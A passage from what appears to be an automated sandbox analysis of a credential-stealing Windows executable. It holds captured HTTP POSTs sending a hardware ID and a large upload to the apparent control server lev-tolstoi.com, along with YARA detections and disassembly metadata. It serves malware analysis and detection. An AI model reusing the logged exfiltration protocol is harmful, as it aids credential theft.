                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wELkaoYoAHKHPRT1CBxiTIOqoZRasNYg4Czc3j1DtE2lHuXaGP%2B%2BqaQg8A9l5gLbKgLSUyDW2aYSPHzbXc4PyCDrdsIiSUtS5sVEDwHFK7EgZSDdsk1xSS5t%2BT9VaiasvX8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                      CF-RAY: 8f80e02e8c277d05-EWR
                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2078&min_rtt=2046&rtt_var=790&sent=15&recv=24&lost=0&retrans=0&sent_bytes=2835&recv_bytes=21491&delivery_rate=1427174&cwnd=195&unsent_bytes=0&cid=6968ce731ed2fcc3&ts=983&x=0"
2024-12-26 11:54:22 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-26 11:54:22 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.9 | 49761 | 172.67.157.254 | 443 | 1460 | C:\Users\user\Desktop\4KDKJjRzm8.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-26 11:54:24 UTC | 281 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=Y6D6EX0ZTZ3UD39FU1K
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                      Content-Length: 1226
                                                                                                                                                                                                                                                      Host: lev-tolstoi.com
2024-12-26 11:54:24 UTC | 1226 | OUT | Data Ascii:
--Y6D6EX0ZTZ3UD39FU1K
Content-Disposition: form-data; name="hwid"

17A4311328D510E6BEBA0C6A975F1733
--Y6D6EX0ZTZ3UD39FU1K
Content-Disposition: form-data; name="pid"

1
--Y6D6EX0ZTZ3UD39FU1K
Content-Disposition: form-data; name="lid"

PsFKDg--pa
2024-12-26 11:54:25 UTC | 1122 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Thu, 26 Dec 2024 11:54:25 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=dk854jklj8es1m3en0v2ro8pjf; expires=Mon, 21 Apr 2025 05:41:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QHIGtAOD5wstXzUAFLgZjigExfM3xHpYsYHPGoXUXa1Ak9lWuOjZ7JZdZcPQQ8tS6afg7ESJ4SnwNRJS18jsGdQvaEGZ7i56yg1r6%2BuOVOnm6PSK%2FW7eD3I3xK68EFoEF2o%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                      CF-RAY: 8f80e03feae680cd-EWR
                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1474&min_rtt=1467&rtt_var=566&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=2143&delivery_rate=1908496&cwnd=178&unsent_bytes=0&cid=58aa55b1eb8c7e1e&ts=765&x=0"
2024-12-26 11:54:25 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-26 11:54:25 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.9 | 49768 | 172.67.157.254 | 443 | 1460 | C:\Users\user\Desktop\4KDKJjRzm8.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-26 11:54:26 UTC | 279 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=4K5AXWGSDPDJ4LF
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                      Content-Length: 585194
                                                                                                                                                                                                                                                      Host: lev-tolstoi.com
2024-12-26 11:54:26 UTC | 15331 | OUT | Data Ascii:
--4K5AXWGSDPDJ4LF
Content-Disposition: form-data; name="hwid"

17A4311328D510E6BEBA0C6A975F1733
--4K5AXWGSDPDJ4LF
Content-Disposition: form-data; name="pid"

1
--4K5AXWGSDPDJ4LF
Content-Disposition: form-data; name="lid"

PsFKDg--pablo
--4K5AX
2024-12-26 11:54:29 UTC 1133 IN HTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Thu, 26 Dec 2024 11:54:29 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=3o8epr7eon4ta112vua2e926fq; expires=Mon, 21 Apr 2025 05:41:08 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YUuyE66yIJJHt5EPdUQP0Ks9T0HS2WHAV%2BaG76eZBhbkUpkDWsQpQ6mR5RrXIRTcUn2eHRWnQkbNeZlYtQcTVxWalTYBcVJEE7JvxE%2BIXBbe4kqBy%2F3jFEUMwZL7s%2BIFwKA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                      CF-RAY: 8f80e04f8bda726b-EWR
                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2081&min_rtt=2072&rtt_var=784&sent=372&recv=606&lost=0&retrans=0&sent_bytes=2834&recv_bytes=587781&delivery_rate=1409266&cwnd=238&unsent_bytes=0&cid=3ca366011439e398&ts=2514&x=0"



                                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                                      Start time:06:54:03
                                                                                                                                                                                                                                                      Start date:26/12/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\4KDKJjRzm8.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\4KDKJjRzm8.exe"
                                                                                                                                                                                                                                                      Imagebase:0x980000
                                                                                                                                                                                                                                                      File size:1'875'456 bytes
                                                                                                                                                                                                                                                      MD5 hash:6BE43AF1D47558E4993B9C341DA5A653
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1488959320.0000000001360000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1515928263.000000000135D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1539387547.000000000131E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1488193272.000000000135F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1543528478.000000000131E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1513284186.000000000135D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1539309056.0000000001360000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1539453644.000000000131E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                      Has exited:true


                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                        Execution Coverage:6%
                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                        Signature Coverage:70.9%
                                                                                                                                                                                                                                                        Total number of Nodes:247
                                                                                                                                                                                                                                                        Total number of Limit Nodes:25
9be110 LdrInitializeThunk 8205->8215 8207->8204 8216 9be110 LdrInitializeThunk 8207->8216 8209->8195 8210->8191 8211->8197 8212->8194 8213->8192 8214->8201 8215->8207 8216->8204
Strings
Memory Dump Source
• Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
Similarity
• API ID:
• String ID: *,-"$3F&D$_^]\$ntxE$pt}w$qRb`$t~v:$uqrs$w}MI${zdy$~mfQ$S\]$WQ$L4$L4
• API String ID: 0-510280711
• Opcode ID: 30132ff1d31d7ea5f28be7cf11023b23cf1b1799fc8b8197cdd3525216842bfc
• Instruction ID: c1227e2c1ff6cea09dde3ef577fc4fbf866102869f26cdf3dcfe1a4f957159a0
• Opcode Fuzzy Hash: 30132ff1d31d7ea5f28be7cf11023b23cf1b1799fc8b8197cdd3525216842bfc
• Instruction Fuzzy Hash: 93C216B2A083408FDB249F28D8917ABB7E5FFD5314F19892CE5D98B396D7349801CB52

Control-flow Graph

control_flow_graph 369, first block 9a1d00-9a1d48 (graph node list omitted)
Strings
Memory Dump Source
• Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
Similarity
• API ID:
• String ID: !@$,$8$9$?$Z$\$\$\$]$]$]$^$^$^$_$_$_$d$g$s
• API String ID: 0-1565257739
• Opcode ID: 306b921e3dc2760d1dc6f35fd07e23b8ec7df1c68904bb3b3eaea4efedf84b69
• Instruction ID: ce4348d2be4a1f13e04890048c072d24ba1c9fc0e3e87a1764896580d7babe05
• Opcode Fuzzy Hash: 306b921e3dc2760d1dc6f35fd07e23b8ec7df1c68904bb3b3eaea4efedf84b69
• Instruction Fuzzy Hash: 90227B7150C7808FD7249B28C48576FBBE1AB86314F284D6DE5EA87392D7B9C845CB83

Control-flow Graph

control_flow_graph 497, first block 9b9280-9b92a4 (graph node list omitted)
APIs
• SysAllocString.OLEAUT32(00001F7A), ref: 009B9550
• CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 009B958E
• SysFreeString.OLEAUT32 ref: 009B98DF
• SysFreeString.OLEAUT32(?), ref: 009B98E5
• GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00001F7A,00000000,00000000,00000000,00000000), ref: 009B992E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: String$Free$AllocBlanketInformationProxyVolume
                                                                                                                                                                                                                                                        • String ID: :;$%$=hn$Jtuj$O^$SB$b{tu$gd$t"j
                                                                                                                                                                                                                                                        • API String ID: 1773362589-1335595022
                                                                                                                                                                                                                                                        • Opcode ID: 231b19b335ed674537f7ac38260c8e389aff76f0493053b4da8303d8f344d173
                                                                                                                                                                                                                                                        • Instruction ID: a56d9dbb7fbe38aab7d684a086f21e4c78456aceaab7dd8e3b2edcb60c9e825f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 231b19b335ed674537f7ac38260c8e389aff76f0493053b4da8303d8f344d173
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5C220476A183519BD310CF24C881B9BBBE6EFC5324F18892CF6949B3A1D775D845CB82

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: (Y6[$.AtC$9]_$D!M#$Gq\s$Gu@w$S%U'$XyR{$Ym]o$b6j4$hI2K$k=W?$pE}G$yQrS$zMzO
                                                                                                                                                                                                                                                        • API String ID: 0-620192811
                                                                                                                                                                                                                                                        • Opcode ID: f7d80d2e7ebfaed0b02f3dca50d60926cc23a4cdb14978f1e18fea4bafc2b09a
                                                                                                                                                                                                                                                        • Instruction ID: 336beada53683a0ee043cb41af5add94d5562b4d8d180801f1e297005a23e648
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f7d80d2e7ebfaed0b02f3dca50d60926cc23a4cdb14978f1e18fea4bafc2b09a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A40263B1614B05CFD324CF25D891BABBBE1FB49314F058A2CE5AB8BAA0D734A444DF50

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: )$+$>$@$F$L$[$`
                                                                                                                                                                                                                                                        • API String ID: 0-4163809010
                                                                                                                                                                                                                                                        • Opcode ID: a60b9b063dfefa45d68a67b6e3c601b56f9aa6b4c9540571bbf2a5bba0192fce
                                                                                                                                                                                                                                                        • Instruction ID: 6d3a328565c3f791c73348d3585728e28734ac361a5fee244813a321059da0f4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a60b9b063dfefa45d68a67b6e3c601b56f9aa6b4c9540571bbf2a5bba0192fce
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 50528F7260C7818BD7249B3CC4953AEBBE1AFD5320F198E2EE5D9C7391D67889418B43

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: "nl$#M%O$*"$4UW$\701$\701$a`|v$wt$AC$MO$pv$uvw
                                                                                                                                                                                                                                                        • API String ID: 0-635595044
                                                                                                                                                                                                                                                        • Opcode ID: 2c3e2a7b2352fda1e19f010fb5c5554f0e44b8022c5e77a42d83e787c13e4dd7
                                                                                                                                                                                                                                                        • Instruction ID: 0125c0b4efeff116419a4472be6b090db71b9ae1826b54647436fdf6fc90f77a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2c3e2a7b2352fda1e19f010fb5c5554f0e44b8022c5e77a42d83e787c13e4dd7
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE02DFB690C3008BD7049F69D8916ABBBF1EFD6314F198D2CE4C58B351E234DA09DB96

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: \$\$\$]$]$]$^$^$^$_$_$_
                                                                                                                                                                                                                                                        • API String ID: 0-1108506012
                                                                                                                                                                                                                                                        • Opcode ID: 639e33bd620422b7e8c30ed01bbbbaa4658ad9381579d666bd63a39d25843e75
                                                                                                                                                                                                                                                        • Instruction ID: d3c9d6726da5ada8c59628634fdd36dacfea35ddcdeda943e4d01762f3f48a73
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 639e33bd620422b7e8c30ed01bbbbaa4658ad9381579d666bd63a39d25843e75
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 73B12971A1C3858FD3148A28CE843ABBFD297C6328F1D4B1DE5E5473C2C678C8459746

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Uninitialize
                                                                                                                                                                                                                                                        • String ID: 6=.)$<1!9$`{tu$lev-tolstoi.com
                                                                                                                                                                                                                                                        • API String ID: 3861434553-1386727196
                                                                                                                                                                                                                                                        • Opcode ID: 71f02ba3792af4a61b6deb5c8888006ed53cce5eb407e587994da2c2a59cc196
                                                                                                                                                                                                                                                        • Instruction ID: 078db6214cf0a7fb9097c7354b45f202d313be402c7b2ec04b65c7868079ea26
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 71f02ba3792af4a61b6deb5c8888006ed53cce5eb407e587994da2c2a59cc196
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C1A136B52057818FD716CF29D4D0A62BFE2FF96310B18859CC4D28F79AD339A846CB61

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
APIs
• ExitProcess.KERNEL32(00000000), ref: 00988A4A
  • Part of subcall function 0098B7B0: FreeLibrary.KERNEL32(00988A31), ref: 0098B7B6
  • Part of subcall function 0098B7B0: FreeLibrary.KERNEL32 ref: 0098B7D7
Strings
Memory Dump Source
• Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
Similarity
• API ID: FreeLibrary$ExitProcess
• String ID: b]u)$}$}

APIs
• GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 009AD3EE
Strings
Memory Dump Source
• Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
Similarity
• API ID: InstalledMemoryPhysicallySystem
• String ID: ><+
Strings
Memory Dump Source
• Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
Similarity
• API ID: InitializeThunk
• String ID: @Ukx$
Strings
Memory Dump Source
• Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: 17A4311328D510E6BEBA0C6A975F1733
                                                                                                                                                                                                                                                        • API String ID: 0-1446595238
                                                                                                                                                                                                                                                        • Opcode ID: c0d6a4dad536ca5bda821abc0d3c5ae9b8bfc57aaf95f7fcd8c38ab969ebcd91
                                                                                                                                                                                                                                                        • Instruction ID: 07417e585d35f44c1d21a7977eccc46ec7b9c05aad286672ba2044d5e46d5d00
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c0d6a4dad536ca5bda821abc0d3c5ae9b8bfc57aaf95f7fcd8c38ab969ebcd91
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EB8138756407418BD3258B38CC92BA7B7E2FFDA315F0DCA6CD4868B347E679A8428750
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • LdrInitializeThunk.NTDLL(009C148A,00000002,00000018,?,?,00000018,?,?,?), ref: 009BE13E
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                                        • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                        • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                                        • String ID: _^]\
                                                                                                                                                                                                                                                        • API String ID: 2994545307-3116432788
                                                                                                                                                                                                                                                        • Opcode ID: a7a199f1ff0747fdb1c265ccc2a843b3241c6fd67e064e9bb9b4d64ea5137f9c
                                                                                                                                                                                                                                                        • Instruction ID: 90c58abed9d896e467d3b8a4b48cb31435ad5a4e014be1ba777ec0b5857915b8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a7a199f1ff0747fdb1c265ccc2a843b3241c6fd67e064e9bb9b4d64ea5137f9c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FD7118B1A0C3005BD7149BA8DC93B7BF7E5DF86318F18942CE58687292E278DC059796
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                                        • String ID: =<32
                                                                                                                                                                                                                                                        • API String ID: 2994545307-852023076
                                                                                                                                                                                                                                                        • Opcode ID: 3d5ea8eec94d816ff11af41fa457c3acd5bad8de50013792c477b645206cdbe2
                                                                                                                                                                                                                                                        • Instruction ID: c4eb535d8a98ec12afd52393b202d9e05dc79b2c3459472958b12d729565e5f6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3d5ea8eec94d816ff11af41fa457c3acd5bad8de50013792c477b645206cdbe2
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CC312638E0C308AFE7149A549DA1F7FB3A9EB86754F18852CF685572A2D730DC40978B
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: ,-
